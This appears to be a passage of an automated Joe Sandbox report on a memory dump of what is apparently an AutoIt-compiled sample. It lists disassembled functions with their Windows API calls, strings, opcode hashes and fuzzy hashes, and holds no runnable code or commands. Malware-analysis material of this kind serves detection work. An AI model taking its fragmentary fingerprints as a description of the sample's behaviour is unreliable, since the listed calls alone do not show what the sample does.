Opcode ID: f2186d5f136ec9877dad4af8fb450122f7b30f1811b809009c98895d8b319046
Instruction ID: 7481ba54039c48ff84266e5b0d2913536740690410118932e1f4f644b3c277ae
Opcode Fuzzy Hash: f2186d5f136ec9877dad4af8fb450122f7b30f1811b809009c98895d8b319046
Instruction Fuzzy Hash: F0E0E571800205EFEF019FB0D808A9D7FB2BB8C311F15D40AFC5AA7250DBB885919F90

Function 005C068D Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 005C068D
GetDC.USER32(00000000), ref: 005C0697
GetDeviceCaps.GDI32(00000000,0000000C), ref: 005C06A3
ReleaseDC.USER32(?), ref: 005C06C4

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: bcffe86845eacdefcfa77a3570e30373db6ce5d06f12863786c0263316a0bac0
Instruction ID: 3d1129e6f7378f7350eca6ee22270136a94c2d9f59c15665bdb1c041fcfbd00b
Opcode Fuzzy Hash: bcffe86845eacdefcfa77a3570e30373db6ce5d06f12863786c0263316a0bac0
Instruction Fuzzy Hash: DBE0EEB1800205AFEF01AFB0D808A9D7FB2BB8C311F15C40AFD5AA7210DBB895918F90

Function 005EB5EF Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON

Download Yara Rule

APIs

Part of subcall function 0059436A: _wcscpy.LIBCMT ref: 0059438D

Part of subcall function 00584D37: __itow.LIBCMT ref: 00584D62
Part of subcall function 00584D37: __swprintf.LIBCMT ref: 00584DAC

__wcsnicmp.LIBCMT ref: 005EB670
WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 005EB739

Strings

LPT, xrefs: 005EB66A

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
String ID: LPT
API String ID: 3222508074-1350329615
Opcode ID: 40c1abeeab87867fd0793985cf0d176bf31f2a3db8aa2b57f168306d75cc8185
Instruction ID: acb1a401fef4e5a4095008837338e459b2da1dae9448e9af30219ec9c343dd40
Opcode Fuzzy Hash: 40c1abeeab87867fd0793985cf0d176bf31f2a3db8aa2b57f168306d75cc8185
Instruction Fuzzy Hash: 52619575A00216AFDB18EF95C885EAEBBB5FF88310F118159F946AB351D770AE40CB50

Function 005C7190 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 148COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 005C7237
_memmove.LIBCMT ref: 005C7291

Strings

#VY, xrefs: 005C730B, 005CCAB3, 005CCACF

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: _memmove
String ID: #VY
API String ID: 4104443479-991703593
Opcode ID: 85fc90048342d63998b2ea315f1c4aaa490fbb9d5f4193f70ee4908ec029fb25
Instruction ID: 8f545819d3828119e7a7d168a0e682c0414eedbfae6b59ecfa4fb15d039c6afc
Opcode Fuzzy Hash: 85fc90048342d63998b2ea315f1c4aaa490fbb9d5f4193f70ee4908ec029fb25
Instruction Fuzzy Hash: 00516A74A006099FCF24CFA8D884AAEBFB1FF45304F24892EE85AD7640E731A955CF51

Function 0058E00D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 0058E01E
GlobalMemoryStatusEx.KERNEL32(?), ref: 0058E037

Strings

@, xrefs: 0058E02B

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: 03f945e6c30babdf82d0f3a9730e66bab6adc9cb9b3c8bd1e71cae1ba92f94e7
Instruction ID: 1da54f6ee367b958ff5a033be7d0c22c29084a8a158d831086f84a6dc57119cd
Opcode Fuzzy Hash: 03f945e6c30babdf82d0f3a9730e66bab6adc9cb9b3c8bd1e71cae1ba92f94e7
Instruction Fuzzy Hash: 25517B71408B469BE320AF50E88ABAFBBF8FFC4714F41884DF9D851191EB709569CB16

Function 00608096 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000027,00001132,00000000,?), ref: 00608186
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0060819B

Strings

', xrefs: 006080EF

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: 8b3c23f17d98b4bfda2eaed98956be64cb4b1e54f5d9621a23bb593ea2d25066
Instruction ID: 210b2c3b8dc3dc1adc7e4de4ef84fc5c5cdb0dfec1370d58cc1cf40a7c955987
Opcode Fuzzy Hash: 8b3c23f17d98b4bfda2eaed98956be64cb4b1e54f5d9621a23bb593ea2d25066
Instruction Fuzzy Hash: 3A411974A4130A9FDB14CF64C881BDA7BB6FF09300F1045AAE945EB391DB71A956CF90

Function 005F2C5A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 005F2C6A
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 005F2CA0

Strings

|, xrefs: 005F2C71

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: CrackInternet_memset
String ID: |
API String ID: 1413715105-2343686810
Opcode ID: 8206a1f464406d1f5126f2c81a4fec44cbbc86c3305300a5e66038302e45b51f
Instruction ID: 582a309e8e80543ee5aa49b8c19143f42623d6d43d72dca24a15524eeafbef2d
Opcode Fuzzy Hash: 8206a1f464406d1f5126f2c81a4fec44cbbc86c3305300a5e66038302e45b51f
Instruction Fuzzy Hash: 66315E71C0011AABCF11EFA4CC89EEEBFB9FF44344F100019F915A6262DB315956DBA4

Function 00607088 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 0060713C
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00607178

Strings

static, xrefs: 006070D8

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: dd625031e605d9de9542d1e632def22b2720703e33628f9b0bbf12c80e6d653e
Instruction ID: 057c1bda96c355ff8ac9db0b45c667212a1e36aaeb3328a8ae1b7a8f502895d9
Opcode Fuzzy Hash: dd625031e605d9de9542d1e632def22b2720703e33628f9b0bbf12c80e6d653e
Instruction Fuzzy Hash: 2631BC71140204AAEB149F78CC80AFB77AAFF88724F109619F9A5972D0DA30AC81DB60

Function 005E3049 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 005E30B8
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 005E30F3

Strings

0, xrefs: 005E30B1

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: d6702c0118af108b14a01acc0420cf6dc6612c1f5ffd01ac5f180d18aada3278
Instruction ID: 37bf51798f853b3d7fa3b80b8894066ed2d5ea4cd28ce23281897babb2e8510d
Opcode Fuzzy Hash: d6702c0118af108b14a01acc0420cf6dc6612c1f5ffd01ac5f180d18aada3278
Instruction Fuzzy Hash: DD31DF31A00285ABEB2C8E5AC88DBAEBFB9BF45350F14401DE8C1A71A0E7709B40CB50

Function 005F40B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON

Download Yara Rule

APIs

__snwprintf.LIBCMT ref: 005F4132

Part of subcall function 00591A36: _memmove.LIBCMT ref: 00591A77

Strings

AUTOITCALLVARIABLE%d, xrefs: 005F4124
, $, xrefs: 005F4172

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: __snwprintf_memmove
String ID: , $$AUTOITCALLVARIABLE%d
API String ID: 3506404897-2584243854
Opcode ID: ee5b77f37bb86fbd988e01f8acec3c7026bd2bd91e328f9db0fd92232129aaa6
Instruction ID: f155f79d18032be69a84393e3179772b31e1c4adb2300c09866a8635a3243421
Opcode Fuzzy Hash: ee5b77f37bb86fbd988e01f8acec3c7026bd2bd91e328f9db0fd92232129aaa6
Instruction Fuzzy Hash: 69218030A0021EABCF10EFA4C895EAE7FB5BF94740F440455FA05A7241DB34AA45DBA5

Function 00606CF9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00606D86
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00606D91

Strings

Combobox, xrefs: 00606D53

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: a7d14eea16b8c10acd8ca793a84eb3ea9b93a095d430d9b4f0ca320a91e8a50a
Instruction ID: 5b44429b36e10bbf36c40659113888adf5cc2a76dbe7e107aa0b1740d91db58c
Opcode Fuzzy Hash: a7d14eea16b8c10acd8ca793a84eb3ea9b93a095d430d9b4f0ca320a91e8a50a
Instruction Fuzzy Hash: 77116071350209AFEF199E54DC91EFB3B6BEF84364F114129F9149B2D0D6719C6187A0

Function 0060722C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 00582111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0058214F
Part of subcall function 00582111: GetStockObject.GDI32(00000011), ref: 00582163
Part of subcall function 00582111: SendMessageW.USER32(00000000,00000030,00000000), ref: 0058216D

GetWindowRect.USER32(00000000,?), ref: 00607296
GetSysColor.USER32(00000012), ref: 006072B0

Strings

static, xrefs: 00607273

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: ff6a33545ecd5de7d0cab1b2de55f8f40463055538638abfd02876a8802d5ef0
Instruction ID: 2952781fa4e9257d6b2aacf7a066e6aebe9d5f9c0c2b91cfea871078cb39a1e9
Opcode Fuzzy Hash: ff6a33545ecd5de7d0cab1b2de55f8f40463055538638abfd02876a8802d5ef0
Instruction Fuzzy Hash: F5214772A5420AAFDF08DFB8CC45AFA7BA9EB08304F045519FD55D3280D774E891DB60

Function 005DE124 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 005DEDB2: lstrlenW.KERNEL32(?,?,?,00000000), ref: 005DEDC4

CreateDispTypeInfo.OLEAUT32(?,00000800,?), ref: 005DE16F
CreateStdDispatch.OLEAUT32(00000000,?,?,?), ref: 005DE18F

Strings

P], xrefs: 005DE138

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: Create$DispDispatchInfoTypelstrlen
String ID: P]
API String ID: 1644177955-4204670249
Opcode ID: aa415935fa7a94737413a5764e2c58eb0aa467156e9986cb68caf652130a7845
Instruction ID: 27e07342b23fd7d57b243f73ae381619e0b453998ee67ac48022eea8dde61db0
Opcode Fuzzy Hash: aa415935fa7a94737413a5764e2c58eb0aa467156e9986cb68caf652130a7845
Instruction Fuzzy Hash: 3121EA7160061AEFCB10DF5AD885999FBB9FF48311714862EE948DB710D770A950DBD0

Function 00606F45 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 00606FC7
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00606FD6

Strings

edit, xrefs: 00606FAB

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: 110c8bb37bd99e26d5a176839d0df9e285ea7fb9ce8332cc2a00dc1d6b6ead65
Instruction ID: 1551e84c3228b3b2a6064547f72e350a1c4164c76c63a17be1dcf346a8166dac
Opcode Fuzzy Hash: 110c8bb37bd99e26d5a176839d0df9e285ea7fb9ce8332cc2a00dc1d6b6ead65
Instruction Fuzzy Hash: 76116A7114020AAFEF149E64EC84EEB3B6BEF05368F509714F964932E0C775DCA1AB60

Function 005E3156 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 005E31C9
GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 005E31E8

Strings

0, xrefs: 005E31BF

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 2af2d3250048fc13c6dd32b6600de78890dac112cfbfc7f17a500e20a3d69012
Instruction ID: 65c1c6cbbf9f9c4b2045ef322874bb14083023456967e3058a8c7427c7767317
Opcode Fuzzy Hash: 2af2d3250048fc13c6dd32b6600de78890dac112cfbfc7f17a500e20a3d69012
Instruction Fuzzy Hash: C2112635D00265ABDB2CDA99DC0DB9D7FB9BF06300F080129E881A7290D770AF04CB90

Function 005834E4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

DeleteObject.GDI32(?), ref: 0058351D
DestroyWindow.USER32(?,?,00594E61), ref: 00583576

Strings

ha, xrefs: 005834E5

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: DeleteDestroyObjectWindow
String ID: ha
API String ID: 2587070983-1391634701
Opcode ID: 8152687f221fe633dfc0be1fe68e7896dc60a416860832ee119b083edb035202
Instruction ID: 570af852c924ce6da5bbaf4d6516e5b7d0ea967612908fca0af90ec820ff5942
Opcode Fuzzy Hash: 8152687f221fe633dfc0be1fe68e7896dc60a416860832ee119b083edb035202
Instruction Fuzzy Hash: 8C215178609201CFCB14FF18E85CA293FE6BB56B10B046979EC06AB661DB71DE44CF54

Function 005F28A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 005F28F8
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 005F2921

Strings

<local>, xrefs: 005F28E9

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: 09fa3e68ce3a52a0fd1e3005ac8c6cb25790e8a8b09a36ae49db5e21f080256c
Instruction ID: fd09876512b700d14d4154687d4d344f7ecff266a9c17980a2542cda69831cc6
Opcode Fuzzy Hash: 09fa3e68ce3a52a0fd1e3005ac8c6cb25790e8a8b09a36ae49db5e21f080256c
Instruction Fuzzy Hash: AF1191B0501329BAEB258A518C89EF6BF68FF05791F10852AF64557140E3B45894DAE1

Function 005F8475 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55networkCOMMON

Download Yara Rule

APIs

Part of subcall function 005F86E0: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,005F849D,?,00000000,?,?), ref: 005F86F7

inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 005F84A0
htons.WSOCK32(00000000,?,00000000), ref: 005F84DD

Strings

255.255.255.255, xrefs: 005F84B8

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: ByteCharMultiWidehtonsinet_addr
String ID: 255.255.255.255
API String ID: 2496851823-2422070025
Opcode ID: cba4a419085524361dea94d63966146abfcd0e1982f40b9e54217c55978a7a92
Instruction ID: 3cfb1f36df1aff30f424455dd73e3b6f6d9924123f7ce55b51c1803dc0d9fb4b
Opcode Fuzzy Hash: cba4a419085524361dea94d63966146abfcd0e1982f40b9e54217c55978a7a92
Instruction Fuzzy Hash: 7411703550021AABDF20AF64C84AFFEBB65FF45314F108517FA15972D1DA71A810C695

Function 005D99BD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00591A36: _memmove.LIBCMT ref: 00591A77

Part of subcall function 005DB79A: GetClassNameW.USER32(?,?,000000FF), ref: 005DB7BD

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 005D9A2B

Strings

ListBox, xrefs: 005D99F5
ComboBox, xrefs: 005D99CA

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 46ad6999060cf348baa1ac889444e932d1de239c148af4df1320a1728aafcba9
Instruction ID: 8e1d6527b20b9147c28b6b7e2f2ac078d26edc6c3f06a0930bc65abb32cd58f3
Opcode Fuzzy Hash: 46ad6999060cf348baa1ac889444e932d1de239c148af4df1320a1728aafcba9
Instruction Fuzzy Hash: 1801B972941126AB8F24EBA8CC55CFE7B6AFF96320B50061BF861573C1DA315C08D650

Function 0058BBC6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0058BC07

Part of subcall function 00591821: _memmove.LIBCMT ref: 0059185B

_wcscat.LIBCMT ref: 005C3593

Strings

sd, xrefs: 0058BC47

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

